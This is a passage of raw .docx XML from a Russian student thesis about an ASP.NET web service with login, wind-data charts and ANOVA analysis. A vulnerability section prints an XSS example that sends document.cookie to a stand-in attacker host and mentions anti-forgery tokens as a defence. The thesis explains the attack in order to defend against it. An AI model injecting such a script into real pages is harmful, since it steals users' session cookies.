      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D7299">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">использует функции из </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>AccountService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> и вызывает представления </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>Login.cshtml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D7299">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>Register.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lastRenderedPageBreak/>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63865E50" w14:textId="24ED78DE" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00E662A4">
      <w:r>
        <w:t>Где в условии проверяется принадлежность пользователя к определённой группе.</w:t>
      </w:r>
      <w:r w:rsidR="00E662A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Процедура аутентификации и авторизации проведена успешно</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t xml:space="preserve"> [20]</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5365EB7C" w14:textId="036B854E" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00A069BF">
      <w:r>
        <w:t>Также в веб сервисе доступна вкладка «Анализ», где можно провести однофакторный дисперсионный анализ</w:t>
      </w:r>
      <w:r w:rsidR="00E662A4">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Математическая модель работы однофакторного дисперсионного анализа описана в параграфе 1.3. Данные необходимо ввести в текстовое поле, одна строка соответствует одной градации фактора, где наблюдения разделены запятыми.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1BDEE7" w14:textId="597ED942" w:rsidR="0093378B" w:rsidRDefault="002E57B7" w:rsidP="009C53F7">
      <w:r w:rsidRPr="002E57B7">
        <w:t xml:space="preserve">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дисперсионный анализ. Описание алгоритма ранжирования представлено в параграфе 1.3.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0DDD28CE" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="009C53F7">
      <w:r>
        <w:t xml:space="preserve">В модуле дисперсионного анализа определён файл </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>Anova.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00870A0C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">где определён класс </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>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sidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>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sidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>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sidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>OneFactorData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, что по </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">сути является набором групп фактора. Содержимое конструктора приведено в </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">Приложении </w:t>
      </w:r>
      <w:r w:rsidR="00CC2EBA">
        <w:t>Г</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3649B39E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="009C53F7">
      <w:r>
        <w:t>В файле</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73321">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>AnalysisController.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> в методе </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>PartialViewResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>SpawnAnalyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>inputData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73321">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>создаются</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73321">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">экземпляры класса </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>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17D29E98" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="009C53F7">
      <w:r>
        <w:t xml:space="preserve">Самым интересным методом данного файла является </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>OneFactorData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>RangeData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>OneFactorData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>[] 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sidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>RangeData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">приведен на схеме </w:t>
      </w:r>
      <w:r w:rsidR="00002242">
        <w:t>28</w:t>
      </w:r>
      <w:r>
        <w:t>:</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6E6F5BB1" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00D16020">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00E662A4">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> –Схема работы алгоритма ранжирования данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3BE85C" w14:textId="65B83E76" w:rsidR="008F392E"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68411719" w14:textId="77777777" w:rsidR="008F392E" w:rsidRDefault="008F392E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D7200F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="002A0DC9">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc161568216"/>
      <w:bookmarkStart w:id="42" w:name="_Toc162709242"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5 Поддержка программы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="61F599BE" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00F73005" w:rsidRDefault="0093378B" w:rsidP="004D79A4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc161568217"/>
      <w:bookmarkStart w:id="44" w:name="_Toc162709243"/>
      <w:r w:rsidRPr="00F73005">
        <w:t>5.1 Тестирование программы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkEnd w:id="44"/>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вёрстки.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70118BE6" w14:textId="360E96C7" w:rsidR="00E662A4"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w:t>
      </w:r>
      <w:r w:rsidR="00E662A4">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326EB96A" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF681E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1592450B" wp14:editId="2980A998">
            <wp:extent cx="4095750" cy="3865022"/>
            <wp:effectExtent l="0" t="0" r="0"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06116" cy="3874804"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCBE80E" w14:textId="2761E329" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 22 – отображение данных из БД на сайте в табличном виде</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BB21AA" w14:textId="72EACCD7" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00EB413D"/>
    <w:p w14:paraId="7802CA10" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="342560EE" wp14:editId="48F968EE">
            <wp:extent cx="4924425" cy="3499637"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>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41345" cy="3511662"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0EAD91" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00F73005">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 23 – график отображения скорости и направления ветра, где по оси абсцисс – время, по оси ординат – фактические значения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C155BC" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00EB413D"/>
    <w:p w14:paraId="6FBCD18C" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="126D1D2E" wp14:editId="7F052D19">
            <wp:extent cx="5681428" cy="4125433"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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1068" cy="4132433"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BFE97C" w14:textId="4DDCB9FF" w:rsidR="00E662A4" w:rsidRPr="00061001" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 24 – Главная страница веб-приложения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA6D59A" w14:textId="4542A5DA" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00EB413D"/>
    <w:p w14:paraId="6F234A4A" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48234887" wp14:editId="0CA245E0">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37E5E707" w14:textId="3177CDC4" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 25 – окно входа в аккаунт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DCD1FC" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="485F6C41" wp14:editId="0FC8D734">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77706D3C" w14:textId="62AB659E" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 26 – окно регистрации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64665B3A" w14:textId="77777777" w:rsidR="00F73005" w:rsidRDefault="00F73005" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F1B9BF2" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26F49459" wp14:editId="0FEBE57D">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513A6436" w14:textId="30CCEFE2" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 27 – изменённая страница, после прохождения процедуры аутентификации и авторизации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E187CB" w14:textId="4EE5AAD8" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00EB413D"/>
    <w:p w14:paraId="0B4810BB" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0066369B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="060CB870" wp14:editId="310C5703">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66B698B1" w14:textId="553B98ED" w:rsidR="00E662A4" w:rsidRPr="00A069BF" w:rsidRDefault="00E662A4" w:rsidP="00E662A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 28 – вкладка «Анализ»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD8126F" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00EB413D"/>
    <w:p w14:paraId="4F3B2BD7" w14:textId="2B0D3DF4" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00EB413D">
      <w:r>
        <w:t>На мобильной версии элементы расположены не в ширину, а в длину страницы, потому что экран мобильных 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lastRenderedPageBreak/>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5478846B" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004B746E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>29</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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45C6B170" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004B746E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Выпадающее меню в открытом положении.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7291E8B5" w14:textId="77777777" w:rsidR="00F73005" w:rsidRDefault="00F73005" w:rsidP="004B746E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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62994B7B" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="000F55F8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Выпадающее меню при отключенном </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF1A4E5" w14:textId="77777777" w:rsidR="00F73005" w:rsidRDefault="00F73005" w:rsidP="000F55F8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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0ED5EAA5" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="000F55F8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Сообщение об ошибке при неправильно введённых данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F977C01" w14:textId="77777777" w:rsidR="00E662A4" w:rsidRDefault="00E662A4" w:rsidP="00E662A4"/>
    <w:p w14:paraId="59312ED0" w14:textId="7354FA44"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E258B2">
        <w:t xml:space="preserve">Б.А. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E258B2">
        <w:t>Доспехова</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E258B2">
        <w:t xml:space="preserve"> «Методика полевого опыта»</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t xml:space="preserve"> [21]</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CC2EBA">
        <w:t xml:space="preserve">Приложении </w:t>
      </w:r>
      <w:r w:rsidR="00CC2EBA">
        <w:t>Д</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0550E189" w14:textId="7C060D13" w:rsidR="002E57B7" w:rsidRDefault="002E57B7" w:rsidP="000F55F8">
      <w:r>
        <w:t>Отдельное внимание стоит уделить основным уязвимостям веб-приложений и методикам их устранения.</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 xml:space="preserve">уже имеет по умолчанию функциональность противодействия </w:t>
      </w:r>
      <w:r w:rsidR="006A246D">
        <w:lastRenderedPageBreak/>
        <w:t>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Pr="00295BB1" w:rsidRDefault="0042767C" w:rsidP="004A1170">
      <w:pPr>
        <w:pStyle w:val="22"/>
        <w:ind w:left="0" w:firstLine="708"/>
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>document</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location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>'https://verybadcoolhacker.com/?cookie='</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encodeURIComponent</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document</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:szCs w:val="24"/>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sidRPr="00527702">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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sidRPr="00527702">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00527702">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ValidateAntiForgeryToken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00527702">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3BEEAB" w14:textId="7E990447" w:rsidR="002C09BA" w:rsidRDefault="002C09BA" w:rsidP="002C09BA">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>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Pr="00295BB1" w:rsidRDefault="002C09BA" w:rsidP="004A1170">
      <w:pPr>
        <w:pStyle w:val="22"/>
        <w:ind w:left="0" w:firstLine="708"/>
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="typ"/>
